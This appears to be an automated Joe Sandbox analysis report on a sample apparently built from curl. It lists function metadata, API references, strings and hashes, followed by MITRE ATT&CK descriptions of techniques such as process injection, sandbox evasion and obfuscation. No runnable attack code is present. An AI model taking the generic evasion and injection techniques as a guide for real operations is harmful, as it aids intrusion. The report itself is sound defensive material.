Opcode ID: a08d7d0a692d410a3fe1977f30f025f9200914e2a6de8a65f04f0000d52b6331
Instruction ID: 7402cc9c46991f30ea39755863bcb021cb6d802fdbaa7b2f0a284eb319ab6a82
Opcode Fuzzy Hash: a08d7d0a692d410a3fe1977f30f025f9200914e2a6de8a65f04f0000d52b6331
Instruction Fuzzy Hash: 7A11B761B0AA8242FB216B15D540279E790DF18FA0F8C1172DAFF476C1DE6CE449B358

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2E210 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D2E263
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D2E2A6

Strings

%d.%d.%d.%d, xrefs: 00007FF7F8D2E23C

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l_errno
String ID: %d.%d.%d.%d
API String ID: 1766030736-3491811756
Opcode ID: f8e917d89a7682ea05b1e0fb3cd2b8083d49edbfa1f21aaaac6e7f6d31628b11
Instruction ID: 14b84876e31746875012132ea2af932767d62fb56444ed7c7f2e9cd6b967b43d
Opcode Fuzzy Hash: f8e917d89a7682ea05b1e0fb3cd2b8083d49edbfa1f21aaaac6e7f6d31628b11
Instruction Fuzzy Hash: A211066260C7C586EB119B24E05026AFBA0EF5D7A4FA84235DBED037C6DB3DC009DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D01A90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D01AE0

Strings

O, xrefs: 00007FF7F8D01B1E
COLUMNS, xrefs: 00007FF7F8D01ABE

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strtol
String ID: COLUMNS$O
API String ID: 76114499-2358961116
Opcode ID: 40ac6184323682b56fd3813741b15b0b49893e21d37cb6113d6c782d9689501f
Instruction ID: 62cb917653e8a7ba5a5a50ccb4201a746593a9e4bb7dd8c865746d112954628e
Opcode Fuzzy Hash: 40ac6184323682b56fd3813741b15b0b49893e21d37cb6113d6c782d9689501f
Instruction Fuzzy Hash: E511A521A0C74282EB25AB62E040279E6A4EF49B90F940235EB7D437D9DF3CD494D794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D33AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 00007FF7F8D33B0A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D33B63

Strings

QUIT, xrefs: 00007FF7F8D33AF9

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _cwprintf_s_lfree
String ID: QUIT
API String ID: 52267941-1967077921
Opcode ID: 477e556c1555472ac9210789b07bf8d2c7be1a3b26ddd63b704c1b514cce5734
Instruction ID: 430db9acf95760a26af2394a8ba9a8ada2e97b753c1aa14d1742b6d7f047440d
Opcode Fuzzy Hash: 477e556c1555472ac9210789b07bf8d2c7be1a3b26ddd63b704c1b514cce5734
Instruction Fuzzy Hash: 91115811A0C78292FB5CAB25E6903B9E391EF4C794F880131CA2D072C1DF2DE459A3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2FBD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 00007FF7F8D2FC0A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2FC60

Strings

QUIT, xrefs: 00007FF7F8D2FBF9

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _cwprintf_s_lfree
String ID: QUIT
API String ID: 52267941-1967077921
Opcode ID: b4968bcee7de153baaf22fe344916283f4b6c6617ce7e2f3671dbcd0cb400f2e
Instruction ID: 44b579aa7626578adf5005e6c0527b121c8a02518e8593c518d03c3b59d8b0af
Opcode Fuzzy Hash: b4968bcee7de153baaf22fe344916283f4b6c6617ce7e2f3671dbcd0cb400f2e
Instruction Fuzzy Hash: 0D11A711A0874692FB24BB25E6807B9E391EF0C7C4F880031CE2D076D1DF2CE45AB7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D18170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

getsockopt.WS2_32 ref: 00007FF7F8D181E3
setsockopt.WS2_32 ref: 00007FF7F8D18212

Strings

@, xrefs: 00007FF7F8D18184

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: getsockoptsetsockopt
String ID: @
API String ID: 194641219-2726393805
Opcode ID: df913511325163248f2d5e56634ea28ce7cd3ecc0f01dfc2952bbdfac12e1077
Instruction ID: ad8b094ab88cde4f7bc70525153e1156f330a5cff9db23f83450420f199a74c8
Opcode Fuzzy Hash: df913511325163248f2d5e56634ea28ce7cd3ecc0f01dfc2952bbdfac12e1077
Instruction Fuzzy Hash: 4711A37160CA8286F310EF20E400676F7A0FF88365F940134DA59476D4DBBDD48CDB98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2FE38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39stringnetworkCOMMON

Download Yara Rule

APIs

gethostname.WS2_32 ref: 00007FF7F8D2FE74
strchr.LIBVCRUNTIME ref: 00007FF7F8D2FE8E

Strings

localhost, xrefs: 00007FF7F8D2FEA4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: gethostnamestrchr
String ID: localhost
API String ID: 3518135066-2663516195
Opcode ID: 761d53a8bde59361d51bb5d8e84baf187234864e756bacb89559d610a43326dd
Instruction ID: a3618e4c2db6128edde586b1ba03284bf8348e7082146b50aaa0560a36dc3ee5
Opcode Fuzzy Hash: 761d53a8bde59361d51bb5d8e84baf187234864e756bacb89559d610a43326dd
Instruction Fuzzy Hash: D211086262CAC581FB21EB24E4403AAE790FF98708FC44031EB9D466C6DF3CD008C768

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D4A16C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF7F8D4A1A2
InitializeCriticalSectionAndSpinCount.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7F8D49E28,?,?,00000001,00007FF7F8D49ACF,?,?,?,?,00007FF7F8D48847), ref: 00007FF7F8D4A1C8

Strings

InitializeCriticalSectionEx, xrefs: 00007FF7F8D4A183, 00007FF7F8D4A196

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: c57afb76dfdf9fa50dca74557498598f1101d04cb740137dcc6229c1b565a3e7
Instruction ID: b0d454b2cbc83ef428e38458b466d6f0a78bbd8f53acf52f99dc1c703dc3cbfe
Opcode Fuzzy Hash: c57afb76dfdf9fa50dca74557498598f1101d04cb740137dcc6229c1b565a3e7
Instruction Fuzzy Hash: 76F08111B0D74581E714AB53A441079E261AF8CBC0FDC4075EA6D03B89CE7CD4499B98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D077B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,00007FF7F8D06C5B), ref: 00007FF7F8D077DB

Strings

curl: try 'curl --help' for more information, xrefs: 00007FF7F8D077F8
curl: , xrefs: 00007FF7F8D077D4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: fputs
String ID: curl: $curl: try 'curl --help' for more information
API String ID: 1795875747-4128371185
Opcode ID: ed19029677f80869e38344be1b8508f314267fb552a729f9a7dcd06eb20116ad
Instruction ID: 5fbc65b0992071d9775c38a35c862d8d4968d6aa5d557f892d55a4e408657e07
Opcode Fuzzy Hash: ed19029677f80869e38344be1b8508f314267fb552a729f9a7dcd06eb20116ad
Instruction Fuzzy Hash: 7EF0BEA5A08B0680EA08AB06A8000A8E721EFADBD0B944132CD2D0B3A4DF3CD048D3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12350 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1236C

Strings

WinSSL, xrefs: 00007FF7F8D12356
WinSSL, xrefs: 00007FF7F8D12365

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l
String ID: WinSSL$WinSSL
API String ID: 1488884202-1321085023
Opcode ID: 238056ff88d02ce5119fa24a2c3a9425861f6d79c7468d5c330a3d13134e9f20
Instruction ID: cabafbbb84548186ad4cfdfaac3581cc4ab88989e328fd8a4b27564663ceff15
Opcode Fuzzy Hash: 238056ff88d02ce5119fa24a2c3a9425861f6d79c7468d5c330a3d13134e9f20
Instruction Fuzzy Hash: 8FD0E2A0A48B4AD1FB05FB21B8416A1E394AF5C310FD80035C46C122E0AE3CA59DABE8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D24308 Relevance: 5.2, APIs: 4, Instructions: 161COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D243E6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D244C4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D244DA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D24536

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9995d6a211b3e798ccdbd738c9d8675bc6ad194b090578f506f663e4213fe4c2
Instruction ID: ea48dcff9993aa27c3b67d6b2fe1903c2f6127c0a190365603d7a763f15339a9
Opcode Fuzzy Hash: 9995d6a211b3e798ccdbd738c9d8675bc6ad194b090578f506f663e4213fe4c2
Instruction Fuzzy Hash: B2615C76A09B4586EB14AB26F950769E3A1FF4CB84F880031DE6E07790CF3CE4599798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D213C4 Relevance: 5.1, APIs: 4, Instructions: 87stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D2142E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D21464
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2149E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D214CD

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$strchrstrncmp
String ID:
API String ID: 2993706390-0
Opcode ID: 700cb26f2c5fb71ae8b9847a1d8b5bea32f8ca74b18bc1e335638a67898d50c7
Instruction ID: dff3865fb7a15015dc82eb87d56050f3ac6fc06b1ad921fccbad1f91232e1f66
Opcode Fuzzy Hash: 700cb26f2c5fb71ae8b9847a1d8b5bea32f8ca74b18bc1e335638a67898d50c7
Instruction Fuzzy Hash: CF318911A0D682C5FF20AB22B810079D654AF5DB90F9C8171CE6E427D1DE2CF44BA2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D4199C Relevance: 5.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D419E4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41A21
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF7F8D148E6), ref: 00007FF7F8D41A4A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF7F8D148E6), ref: 00007FF7F8D41A65

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d036fb8021ae91222c6f94acdca1afd0e9ae6d666ddc8fd1f663f5fb044b4c20
Instruction ID: 02fcce9e9aa41258a6c6ca3ac267b60509e96d8db6d9fc6be50bc80116a39cca
Opcode Fuzzy Hash: d036fb8021ae91222c6f94acdca1afd0e9ae6d666ddc8fd1f663f5fb044b4c20
Instruction Fuzzy Hash: F921DB26618B4593EB04AF22F954368A360FF4DB94F480171CE2E1BB90CF3CE4699798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D47420 Relevance: 5.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D42040,?,?,?,00007FF7F8D2FC4C), ref: 00007FF7F8D47468
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D42040,?,?,?,00007FF7F8D2FC4C), ref: 00007FF7F8D474A3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 00007FF7F8D474CB
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 00007FF7F8D474E6

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 7dce3c025a71e321e4df44194207822269153505a38e31d3195985eaca39c239
Instruction ID: 9df409d7b03f0e6856c92457981817b58f60829a87f6404959365a9b55ed74ff
Opcode Fuzzy Hash: 7dce3c025a71e321e4df44194207822269153505a38e31d3195985eaca39c239
Instruction Fuzzy Hash: 5C21EB26608A45D2EB04AF62F960368A320FF8CF90F4C4071CE1E0B790CF3CE4699398

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D41EE0 Relevance: 5.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41F28
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41F65
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41F8E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41FA9

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 51768b4d8de0e2a93f56d1a9511dec74265358ede943afb568bbbc92874072b8
Instruction ID: 2a9f3f6f79dd55351d2021587956e6bbafe07755b8aad416c8c00f12837a7cb9
Opcode Fuzzy Hash: 51768b4d8de0e2a93f56d1a9511dec74265358ede943afb568bbbc92874072b8
Instruction Fuzzy Hash: 2121BC26618A4593EB04AF22F954368A360FF4DF94F480171DE1E1B790CF3CE4699798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D33F58 Relevance: 5.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D33FA0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D33FCD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D33FF2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D34013

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 335d3a068d52f8a9023d286bf79b6a74648618da7702932a2584bf17cb3a68fa
Instruction ID: 4ad93a606c47e577ad2b66bef816540467e924bf3ae6433db63d45deb2ec8766
Opcode Fuzzy Hash: 335d3a068d52f8a9023d286bf79b6a74648618da7702932a2584bf17cb3a68fa
Instruction Fuzzy Hash: 59211A36618A85C2E764EF26F894369F364FB48B80F884135CB9E577A0CF3CE4499794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D41538 Relevance: 5.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D19DE0,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D4155D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D4159E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D415B9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D415D4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: a0c665d73e167c2058028689bcbc984259e28be4e076b64b006e3debd7234855
Instruction ID: 00280123eaf008c355a9c4f894fc7a56d707df496d7211a3bb9f993d5bf1c4dc
Opcode Fuzzy Hash: a0c665d73e167c2058028689bcbc984259e28be4e076b64b006e3debd7234855
Instruction Fuzzy Hash: 2211A726658A45D3EB14AF22F994369A330FF9CB84F484131DE1E07794CF3CE4699798

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

